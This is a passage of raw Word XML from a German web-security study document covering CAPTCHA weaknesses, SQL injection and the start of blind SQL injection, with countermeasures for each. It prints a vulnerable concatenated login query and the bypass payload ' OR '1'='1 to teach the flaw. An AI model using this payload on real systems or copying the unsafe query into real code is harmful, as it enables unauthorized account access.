          <w:bCs/>
        </w:rPr>
        <w:t>Verwendung von Content Security Policy (CSP):</w:t>
      </w:r>
      <w:r w:rsidRPr="009804F2">
        <w:t xml:space="preserve"> Um XSS-Angriffe zu verhindern, sollte eine CSP implementiert werden, die das Ausführen von JavaScript aus nicht vertrauenswürdigen Quellen einschränkt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA90149" w14:textId="6A98B412" w:rsidR="009804F2" w:rsidRDefault="009804F2" w:rsidP="009804F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009804F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Insecure Captcha</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8031D1" w14:textId="77777777" w:rsidR="009804F2" w:rsidRDefault="009804F2" w:rsidP="009804F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23FC8EE8" w14:textId="7894AF90" w:rsidR="009804F2" w:rsidRDefault="009804F2" w:rsidP="009804F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Insecure CAPTCHA bezieht sich auf die Implementierung eines CAPTCHA-Systems (Completely Automated Public Turing test to tell Computers and Humans Apart), das Schwachstellen aufweist oder auf eine Weise umgangen werden kann, die es weniger effektiv bei der Verhinderung von automatisierten oder böswilligen Aktivitäten macht. CAPTCHAs sind dazu gedacht, menschliche Benutzer von automatisierten Skripten oder Bots zu unterscheiden, indem sie Aufgaben stellen, die für Menschen lösbar, aber für Computer herausfordernd sind. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B03151A" w14:textId="77777777" w:rsidR="009804F2" w:rsidRDefault="009804F2" w:rsidP="009804F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="304D507A" w14:textId="77777777" w:rsidR="009804F2" w:rsidRPr="009804F2" w:rsidRDefault="009804F2" w:rsidP="009804F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009804F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Schwachstellen und Probleme unsicherer CAPTCHAs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21151D7B" w14:textId="57A2031F" w:rsidR="009804F2" w:rsidRDefault="009804F2" w:rsidP="009804F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="009804F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Wiederverwendung von CAPTCHA-Lösungen:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Wenn CAPTCHA-Lösungen wiederverwendet werden können oder eine begrenzte Anzahl von möglichen Fragen/Aufgaben besteht, könnten Angreifer diese Antworten sammeln und automatisieren.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4218C443" w14:textId="77777777" w:rsidR="009804F2" w:rsidRDefault="009804F2" w:rsidP="009804F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="009804F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Automatisierte Lösungen</w:t>
      </w:r>
      <w:r>
        <w:t>: Fortschritte in der künstlichen Intelligenz und im maschinellen Lernen haben dazu geführt, dass viele CAPTCHA-Formen, wie textbasierte oder einfache Bilderkennungs-CAPTCHAs, automatisch mit hoher Genauigkeit gelöst werden können.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2E0A3E" w14:textId="77777777" w:rsidR="009804F2" w:rsidRDefault="009804F2" w:rsidP="009804F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="009804F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mangel an Zugänglichkeit:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ein CAPTCHA, das nicht barrierefrei ist, kann nicht nur für Menschen mit Behinderungen eine Hürde darstellen, sondern auch die Sicherheit beeinträchtigen, wenn es alternative, weniger sichere Methoden zur Verifikation bietet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404BC670" w14:textId="77777777" w:rsidR="009804F2" w:rsidRDefault="009804F2" w:rsidP="009804F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="009804F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Schwache Implementierung</w:t>
      </w:r>
      <w:r>
        <w:t>: Unsichere Übertragung von CAPTCHA-Validierungsdaten (z.B. über unverschlüsselte Verbindungen) oder die Vorhersehbarkeit von CAPTCHA-IDs können es Angreifern ermöglichen, die Überprüfung zu umgehen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36088F54" w14:textId="77777777" w:rsidR="009804F2" w:rsidRDefault="009804F2" w:rsidP="009804F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="009804F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fehlkonfiguration</w:t>
      </w:r>
      <w:r>
        <w:t>: Falsch konfigurierte CAPTCHA-Systeme, die zu streng oder zu nachsichtig sind, können entweder Benutzer aussperren oder Bots durchlassen, was die Effektivität des Schutzes mindert.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016F5ECA" w14:textId="77777777" w:rsidR="009804F2" w:rsidRPr="009804F2" w:rsidRDefault="009804F2" w:rsidP="009804F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009804F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Gegenmaßnahmen und Best Practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2894139F" w14:textId="77777777" w:rsidR="009804F2" w:rsidRDefault="009804F2" w:rsidP="009804F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="009804F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Diversifizierung der CAPTCHA-Aufgaben:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Verwenden Sie eine breite Palette von CAPTCHA-Typen und aktualisieren Sie sie regelmäßig, um automatisierte Lösungsansätze zu erschweren.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C182FE" w14:textId="77777777" w:rsidR="009804F2" w:rsidRDefault="009804F2" w:rsidP="009804F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="009804F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Einsatz fortschrittlicher Technologien:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Nutzen Sie fortschrittlichere CAPTCHA-Formen, wie reCAPTCHA v3 von Google, das Benutzerverhalten analysiert, anstatt direkte Interaktionen zu fordern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CB3383" w14:textId="77777777" w:rsidR="009804F2" w:rsidRDefault="009804F2" w:rsidP="009804F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="009804F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sicherheitsfeatures integrieren</w:t>
      </w:r>
      <w:r>
        <w:t>: Implementieren Sie zusätzliche Sicherheitsmaßnahmen wie Zeitmessung der Antwort, Analyse des Benutzerverhaltens und Nutzung von Session-Tokens, um Automatisierung zu erschweren.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B83F3AB" w14:textId="77777777" w:rsidR="009804F2" w:rsidRDefault="009804F2" w:rsidP="009804F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="009804F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Barrierefreiheit gewährleisten:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Stellen Sie sicher, dass CAPTCHAs zugänglich sind, indem Sie alternative Verifikationsmethoden für Benutzer mit Behinderungen anbieten.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01ED2F74" w14:textId="77777777" w:rsidR="009804F2" w:rsidRDefault="009804F2" w:rsidP="009804F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="009804F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Verschlüsselung verwenden:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Sichern Sie die Übertragung von CAPTCHA-Daten mit HTTPS, um Man-in-the-Middle-Angriffe zu verhindern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F2A41B" w14:textId="39B8F0A4" w:rsidR="009804F2" w:rsidRDefault="009804F2" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="009804F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Anpassung und Überwachung:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Passen Sie die Schwierigkeit des CAPTCHAs basierend auf dem Kontext der Anfrage und dem Risikolevel an und überwachen Sie die Effektivität, um Anpassungen vorzunehmen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C37DFB" w14:textId="44A44425" w:rsidR="0021754F" w:rsidRPr="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0021754F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168A029B" w14:textId="77777777" w:rsidR="0021754F" w:rsidRPr="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0021754F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Funktionsweise von SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4792AC94" w14:textId="77777777" w:rsidR="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>SQL-Injection-Angriffe basieren auf der Einfügung oder "Injektion" von SQL-Code durch Eingabefelder oder andere Eingabemechanismen einer Webanwendung, die direkt in SQL-Abfragen eingefügt werden. Wenn eine Anwendung unsicher konstruierte SQL-Statements verwendet, die Benutzereingaben enthalten, kann ein Angreifer speziell gestaltete Eingaben vornehmen, die das Verhalten der SQL-Abfrage verändern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F3936A" w14:textId="77777777" w:rsidR="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B6B27B0" w14:textId="77777777" w:rsidR="0021754F" w:rsidRPr="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0021754F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Beispiele für SQL-Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E670069" w14:textId="128FFF09" w:rsidR="0021754F" w:rsidRPr="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0021754F">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Angenommen, eine Webanwendung verwendet folgenden unsicheren SQL-Code, um Benutzer nach ihrem Benutzernamen und Passwort zu authentifizieren:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0087A01A" w14:textId="77777777" w:rsidR="0021754F" w:rsidRPr="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0021754F">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E15C4E8" w14:textId="77777777" w:rsidR="0021754F" w:rsidRPr="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0021754F">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542FF2B7" w14:textId="77777777" w:rsidR="0021754F" w:rsidRPr="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0021754F">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT * FROM users WHERE username = '$username' AND password = '$password'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793DEB5C" w14:textId="77777777" w:rsidR="0021754F" w:rsidRPr="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="010304BD" w14:textId="47D977ED" w:rsidR="0021754F" w:rsidRPr="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0021754F">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Ein Angreifer könnte in das Benutzernamenfeld folgenden Wert eingeben:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD98992" w14:textId="77777777" w:rsidR="0021754F" w:rsidRPr="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0021754F">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137F87C0" w14:textId="77777777" w:rsidR="0021754F" w:rsidRPr="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0021754F">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E878A5F" w14:textId="77777777" w:rsidR="0021754F" w:rsidRPr="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0021754F">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>' OR '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D155E8" w14:textId="77777777" w:rsidR="0021754F" w:rsidRPr="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76AE1B72" w14:textId="478E7AE7" w:rsidR="0021754F" w:rsidRPr="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0021754F">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Wenn dieser Wert in die SQL-Abfrage eingefügt wird, ohne zuerst desinfiziert zu werden, könnte die resultierende Abfrage so aussehen:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105FD15D" w14:textId="77777777" w:rsidR="0021754F" w:rsidRPr="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0021754F">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EF9475" w14:textId="77777777" w:rsidR="0021754F" w:rsidRPr="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0021754F">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701F24C4" w14:textId="77777777" w:rsidR="0021754F" w:rsidRPr="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0021754F">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT * FROM users WHERE username = '' OR '1'='1' AND password = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C74E3F9" w14:textId="77777777" w:rsidR="0021754F" w:rsidRPr="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2579F057" w14:textId="49AE6235" w:rsidR="0021754F" w:rsidRPr="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0021754F">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Da '1'='1' immer wahr ist, würde diese Bedingung für jeden Benutzer in der Datenbank zutreffen, was dem Angreifer möglicherweise Zugriff auf das erste Benutzerkonto in der Tabelle users gibt, ohne ein gültiges Passwort zu benötigen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52060701" w14:textId="77777777" w:rsidR="0021754F" w:rsidRPr="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0021754F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Gegenmaßnahmen gegen SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C47A38E" w14:textId="77777777" w:rsidR="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Verwendung von Prepared Statements und Parametrisierten Abfragen: Dies ist die effektivste Maßnahme zur Verhinderung von SQL-Injection, da die Datenbank die Daten von den SQL-Befehlen trennt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735A5187" w14:textId="77777777" w:rsidR="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="0021754F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Verwendung von Stored Procedures:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Obwohl Stored Procedures allein nicht immer vor SQL-Injection schützen, können sie das Risiko verringern, wenn sie richtig verwendet werden und nicht dynamisch SQL-Code generieren.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF6AB2A" w14:textId="77777777" w:rsidR="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="0021754F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Validierung der Eingaben:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Eingaben sollten sowohl auf Client- als auch auf Serverseite validiert werden, um sicherzustellen, dass nur erwartete Daten an die Datenbank gesendet werden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141165AB" w14:textId="77777777" w:rsidR="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="0021754F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Escaping von Eingaben</w:t>
      </w:r>
      <w:r>
        <w:t>: Obwohl dies weniger sicher ist als die Verwendung von Prepared Statements, kann das Escaping spezieller Zeichen in SQL-Abfragen in einigen Fällen als zusätzliche Sicherheitsebene dienen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F78B9E" w14:textId="77777777" w:rsidR="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="0021754F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Begrenzung der Datenbankrechte</w:t>
      </w:r>
      <w:r>
        <w:t>: Anwendungsbenutzer sollten minimale Rechte in der Datenbank haben, mit Einschränkungen für das, was sie lesen, ändern oder löschen können</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8C8C55" w14:textId="0CB0D4CF" w:rsidR="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="0021754F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Verwendung von Web Application Firewalls (WAFs):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAFs können dazu beitragen, SQL-Injection-Angriffe zu erkennen und zu blockieren, bevor sie die Anwendung erreichen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273D0450" w14:textId="1AED4F12" w:rsidR="0021754F" w:rsidRPr="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0021754F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SQL Injection (Blind)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6128DE2F" w14:textId="77777777" w:rsidR="0021754F" w:rsidRPr="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0021754F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Funktionsweise von Blind SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E0958D" w14:textId="77777777" w:rsidR="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Bei Blind SQL Injection nutzt der Angreifer Unterschiede in der Antwortzeit, HTTP-Antwortstatuscodes oder Seiteninhalten, die durch unterschiedliche SQL-Abfragen verursacht werden, um Informationen über die Datenbank zu sammeln. Es gibt zwei Haupttypen von Blind SQL-Injection-Techniken:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD63250" w14:textId="77777777" w:rsidR="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D551D14" w14:textId="77777777" w:rsidR="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="0021754F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Boolean-based (Content-based) Blind SQL Injection:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Der Angreifer sendet eine SQL-Abfrage, die zu einem wahr/falsch-Ergebnis führt. Basierend auf Veränderungen im Antwortinhalt der Anwendung oder im Verhalten kann der Angreifer bestimmen, ob die injizierte Bedingung wahr oder falsch ist.</w:t>
      </w:r>
    </w:p>
